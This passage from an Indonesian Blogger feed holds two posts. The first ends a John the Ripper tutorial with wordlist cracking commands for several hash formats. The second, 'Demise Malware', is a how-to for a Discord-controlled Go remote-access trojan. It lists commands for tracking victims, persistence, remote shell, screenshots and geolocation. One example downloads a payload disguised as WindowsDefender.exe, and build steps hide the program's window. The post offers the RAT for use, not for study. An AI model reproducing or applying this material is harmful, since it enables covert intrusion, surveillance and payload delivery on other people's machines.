crack.txt&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;MD5&lt;/b&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;Untuk mendekripsi enkripsi MD5 kita akan menggunakan RockYou sebagai daftar kata dan memecahkan kata sandi seperti yang ditunjukkan di bawah ini:&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;/p&gt;&lt;blockquote&gt;john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5 rack.txt&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;MD4&lt;/b&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;Untuk mendekripsi enkripsi MD4 kita akan menggunakan RockYou sebagai daftar kata dan memecahkan kata sandi seperti yang ditunjukkan di bawah ini:&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;/p&gt;&lt;blockquote&gt;john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md4 crack.txt&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;SHA256&lt;/b&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;Untuk mendekripsi enkripsi SHA256 kita akan menggunakan RockYou sebagai daftar kata dan memecahkan kata sandi seperti yang ditunjukkan di bawah ini:&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;/p&gt;&lt;blockquote&gt;john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-sha256 crack.txt&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;RIPEMD128&lt;/b&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;Untuk mendekripsi enkripsi RIPEMD128 kita akan menggunakan RockYou sebagai daftar kata dan memecahkan kata sandi seperti yang ditunjukkan di bawah ini:&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;/p&gt;&lt;blockquote&gt;john --wordlist=/usr/share/wordlists/rockyou.txt --format=ripemd-128 crack.txt&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;Whirlpool&lt;/b&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;Untuk mendekripsi enkripsi pusaran air kita akan menggunakan RockYou sebagai daftar kata dan memecahkan kata sandi seperti yang ditunjukkan di bawah ini:&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;/p&gt;&lt;blockquote&gt;john --wordlist=/usr/share/wordlists/rockyou.txt --format=whirlpool crack.txt&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;View all Format&lt;/b&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;John the Ripper mendukung banyak enkripsi, beberapa di antaranya kami tunjukkan di atas. Untuk melihat semua format yang didukungnya:&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;/p&gt;&lt;blockquote&gt;john --list=format&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;Menyingkat Pilihan&lt;/b&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;Kita tidak perlu mengetik opsi lengkap setiap kali kita menggunakan john the ripper, Pengembang telah memberi pengguna opsi untuk menyingkat opsi seperti&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;–single dapat ditulis sebagai -si&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;–format dapat ditulis sebagai -form&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;Seperti contoh di bawah ini adalah bagaimana menggunakan singkatan ini.&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;/p&gt;&lt;blockquote&gt;john -si crack.txt -form=raw-md5&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left;&quot;&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: justify;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5lSHRMSIFgolGaPZI5wxtBI1FkhYt4FxT_ET1JsBrCoW_VRhsliNiXAXjRziAWVl2AQVinhbV48idG4Ff__PTQpve-6uQnc9Dp18wE81ZQ_wBrrBZV6zHCyFuZPLIQFrDIJzNFyx8a5CHDNSaiW2-0crWj-VccvgV0c1R79_riKe7_dXOXST15Pzx/s1080/Screenshot_20221227_001132_Opera.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;323&quot; data-original-width=&quot;1080&quot; height=&quot;161&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5lSHRMSIFgolGaPZI5wxtBI1FkhYt4FxT_ET1JsBrCoW_VRhsliNiXAXjRziAWVl2AQVinhbV48idG4Ff__PTQpve-6uQnc9Dp18wE81ZQ_wBrrBZV6zHCyFuZPLIQFrDIJzNFyx8a5CHDNSaiW2-0crWj-VccvgV0c1R79_riKe7_dXOXST15Pzx/w538-h161/Screenshot_20221227_001132_Opera.jpg&quot; width=&quot;538&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;span style=&quot;background-color: #262626; font-family: Roboto, Arial;&quot;&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Singkatan lain yang bisa kita gunakan adalah:&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;–wordlist dapat ditulis sebagai -w&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;blockquote&gt;john -w=/usr/share/wordlists/rockyou.txt crack.txt -form=raw-md5&lt;/blockquote&gt;&lt;/div&gt;&lt;/span&gt;&lt;p style=&quot;text-align: left;&quot;&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: justify;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHh9hwIsns7w69FbHDb1qmOuhsvMMd54IigTHp_1Czkb5FnStSgC-dsnY7ODr5nCIOhiKRMY1EzNC1Owyu3IDCH90tqA5dNTLItpyaVWWfsFfG-yIMZnYJqhR-BB8aU0mfV6he6djNj0rQ8hZPIsflzZkqsLadme2MoaSQ-Z-hlmWCmzqFq87PfOut/s1079/Screenshot_20221227_001436_Opera.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;227&quot; data-original-width=&quot;1079&quot; height=&quot;117&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHh9hwIsns7w69FbHDb1qmOuhsvMMd54IigTHp_1Czkb5FnStSgC-dsnY7ODr5nCIOhiKRMY1EzNC1Owyu3IDCH90tqA5dNTLItpyaVWWfsFfG-yIMZnYJqhR-BB8aU0mfV6he6djNj0rQ8hZPIsflzZkqsLadme2MoaSQ-Z-hlmWCmzqFq87PfOut/w559-h117/Screenshot_20221227_001436_Opera.jpg&quot; width=&quot;559&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: justify;&quot;&gt;&lt;b&gt;Memecah Banyak File&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: justify;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: justify;&quot;&gt;Kita juga dapat memecahkan banyak file hash jika mereka memiliki enkripsi yang sama. Mari kita ambil contoh, kita memiliki dua file.&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: justify;&quot;&gt;&lt;/div&gt;&lt;blockquote&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: justify;&quot;&gt;crack.txt&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: justify;&quot;&gt;md5.txt&lt;/div&gt;&lt;/blockquote&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: justify;&quot;&gt;Keduanya berisi hash md5, jadi untuk meng-crack kedua file dalam satu sesi, kita akan menjalankan john sebagai berikut:&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: justify;&quot;&gt;Sintaks: john [file 1][file 2]&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: justify;&quot;&gt;&lt;blockquote&gt;john -form=raw-md5 crack.txt md5.txt&lt;/blockquote&gt;&lt;/div&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;Cukup sekian dulu pembahasan tentang mbah John the Ripper, mudah-mudahan pembahasan ini bisa bermanfaat.&lt;/p&gt;</content><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1191330060666792521/posts/default/9159055865067005562'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1191330060666792521/posts/default/9159055865067005562'/><link rel='alternate' type='text/html' href='https://xybernote.blogspot.com/2022/12/mengenal-lebih-dalam-john-ripper.html' title='Dasar John The Ripper'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiG-Qq63pbupxxJniEHA3j0w_IqK9xDaH6z2DjojTFPnAxJmwqOu43wpd1rxYaVsJmwdMw9amluNd67kmkuWNds4kP5Z0bviyG7yoLWL6UHKKHjTaw7-ttLYlcJFYuoXOJCD4VARjIj_hD9qQubx3RGaZsSd82iNO7RgN5e4anJLUqxBizBb7OD4oPJ/s72-w640-h354-c/john.jpg" height="72" width="72"/></entry><entry><id>tag:blogger.com,1999:blog-1191330060666792521.post-6516265396621714771</id><published>2022-12-13T07:36:00.022-08:00</published><updated>2023-03-29T07:22:15.282-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Malware"/><category scheme="http://www.blogger.com/atom/ns#" term="xyber"/><title type='text'>Demise Malware</title><content type='html'>&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2nzfIm9rHAHJ1uuvxDxNxTnpVRAl3Sr3DsBEeWgdq0bJCgoC4EAfSS6SqyxBOzDwAgJmcq-AcHfamvH24WxVkl6ql3PH88sHi-UvL9wpiFuVo0yqVpa0NmOa9M-F9ebyZ4zYxSJ5yqKs75tNXsdsZ0AAGmY7sH9MOr8_BnZeZ-WtiGH7lo-T8avK1/s639/184524385-89bda0f6-b46d-4e5e-868f-f044dac0ae1d.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;502&quot; data-original-width=&quot;639&quot; height=&quot;502&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2nzfIm9rHAHJ1uuvxDxNxTnpVRAl3Sr3DsBEeWgdq0bJCgoC4EAfSS6SqyxBOzDwAgJmcq-AcHfamvH24WxVkl6ql3PH88sHi-UvL9wpiFuVo0yqVpa0NmOa9M-F9ebyZ4zYxSJ5yqKs75tNXsdsZ0AAGmY7sH9MOr8_BnZeZ-WtiGH7lo-T8avK1/w640-h502/184524385-89bda0f6-b46d-4e5e-868f-f044dac0ae1d.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Sumber &lt;a href=&quot;https://github.com/pwnengine/Demise&quot;&gt;&lt;b&gt;Github&lt;/b&gt;&lt;/a&gt;&lt;div&gt;&lt;br /&gt;&lt;br /&gt;&lt;div&gt;Demise adalah malware Golang yang menggunakan Discord untuk komunikasi.&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Commands&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;show victims connected&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;$victims&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;extract a zip file&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;$unzip &amp;lt;.zip file on drive&amp;gt;&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Example:&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;$unzip DESKTOP-2HJUUK6\Tod main.zip C:\msys64\home\Tod\projects\go\src\github.com\0xSegFaulted\&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;run Demise on startup&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;$startup&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Example&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;$startup DESKTOP-2HJUUK6\Tod&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;run an executable (some executables require admin)&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;$run&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Example&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;$run DESKTOP-2HJUUK6\Tod file.exe&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;download file&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;$dl&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Example&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;$dl DESKTOP-2HJUUK6\Tod http://somesite.com/payload.exe WindowsDefender.exe&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;run commands&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;$shell &amp;lt;flags... optional&amp;gt;&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Example&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;$shell DESKTOP-2HJUUK6\Tod whoami&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;screenshot desktop&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;$ss&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Example&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;$ss DESKTOP-2HJUUK6\Tod&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;get IP&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;$ip&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Example&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;$ip DESKTOP-2HJUUK6\Tod&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;kill session&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;$kill&lt;/p&gt;&lt;p&gt;$kill DESKTOP-2HJUUK6\Tod&lt;/p&gt;&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;geolocate&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;$geoloc&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;$geoloc DESKTOP-2HJUUK6\Tod&lt;/p&gt;&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;How To&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;1. Download source code&lt;br /&gt;2. Download &lt;a href=&quot;https://go.dev/&quot;&gt;golang&lt;/a&gt;&amp;nbsp;pilih instalasi yang benar untuk os Anda&lt;br /&gt;3. buat server (ini adalah RAT bot)&lt;br /&gt;4. membuat bot. Saya tidak akan menunjukkan caranya karena ada banyak tutorial di &lt;a href=&quot;https://www.youtube.com/watch?v=7A-bnPlxj4k&amp;amp;t=20s&quot;&gt;youtube&lt;/a&gt;&amp;nbsp;&lt;br /&gt;5. tambahkan bot ke server Anda dan buat saluran teks baru di server Anda&lt;br /&gt;6. salin token bot Anda dan id saluran teks yang baru saja Anda buat&lt;div&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhw2CYf0wFHF9D7BrsfJm1Tw-FtvM-p3mGFQ2UposSvyWAyTxwXCe6tHV82XhifcgF4M6i6NRwGsUXc6VRHA1mhn1l8czQVxAIK5AjHfu7HnUf3cpJE4LByhUXcjyb6j2V7QX68g_eTRxJzWE-fxOg9vZ3lxy8-eSX7HFq4mEPX73qAHSlJgHECUkuK/s865/192041038-0c5dcd79-a98b-45ea-88fe-800bb28e5fbe.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;553&quot; data-original-width=&quot;865&quot; height=&quot;410&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhw2CYf0wFHF9D7BrsfJm1Tw-FtvM-p3mGFQ2UposSvyWAyTxwXCe6tHV82XhifcgF4M6i6NRwGsUXc6VRHA1mhn1l8czQVxAIK5AjHfu7HnUf3cpJE4LByhUXcjyb6j2V7QX68g_eTRxJzWE-fxOg9vZ3lxy8-eSX7HFq4mEPX73qAHSlJgHECUkuK/w640-h410/192041038-0c5dcd79-a98b-45ea-88fe-800bb28e5fbe.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;7. letakkan id saluran di sini di awal kode sumber&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8OyrUiy2CVrVdRr5Fc94L8nZ1jsg2Qbm9qoUcWhFPPwfNiZbtTnbUlIkntO2dvFUiQSfPYZmWDx5_7GitaXwaMSA6dZQkH0lHhCGrKaZ-e354QBmLMWgAlONfb9bNQe3E8fsk_Z7MOBEpQ80jXHAEf6tDi1AOSHVCS2ZyiLYWDkXee_L6GfTWTOEt/s800/192041183-22706c07-32f7-4763-b822-d90cdd3c092b.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;342&quot; data-original-width=&quot;800&quot; height=&quot;274&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8OyrUiy2CVrVdRr5Fc94L8nZ1jsg2Qbm9qoUcWhFPPwfNiZbtTnbUlIkntO2dvFUiQSfPYZmWDx5_7GitaXwaMSA6dZQkH0lHhCGrKaZ-e354QBmLMWgAlONfb9bNQe3E8fsk_Z7MOBEpQ80jXHAEf6tDi1AOSHVCS2ZyiLYWDkXee_L6GfTWTOEt/w640-h274/192041183-22706c07-32f7-4763-b822-d90cdd3c092b.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;8.&amp;nbsp;letakkan token bot Anda di sini&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;9.&amp;nbsp;kompilasi dengan perintah yang mirip dengan ini&quot;go build -ldflags=&quot;-s -w -H=windowsgui&quot; .&quot; -H=windowsgui akan menyembunyikan window&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;jika bot tidak merespons perintah, ubah niat Anda&lt;div&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' 